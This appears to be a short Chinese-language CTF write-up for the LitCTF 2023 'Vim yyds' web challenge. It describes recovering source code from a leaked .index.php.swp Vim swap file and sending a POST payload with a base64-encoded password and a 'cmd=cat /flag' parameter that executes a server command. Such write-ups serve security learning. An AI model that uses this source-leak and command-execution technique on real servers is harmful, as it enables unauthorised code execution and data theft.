0%

en~

2024-08-05 09:52By
XxX313121
vim泄漏RCE源码泄漏Linux命令目录扫描

Problem: [LitCTF 2023]Vim yyds

[[toc]]

思路

  • 解题大致思路
    下载.index.php.swp 分析代码,给password的内容进行base64编码
    然后使用post发送请求

EXP

  • 具体攻击代码
    password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag

总结

  • 对该题的考点总结
还没有人赞赏,快来当第一个赞赏的人吧!
  
© 著作权归作者所有
加载失败
广告
×
评论区
添加新评论
文章信息
板块WEB
作者
XxX313121
目录导航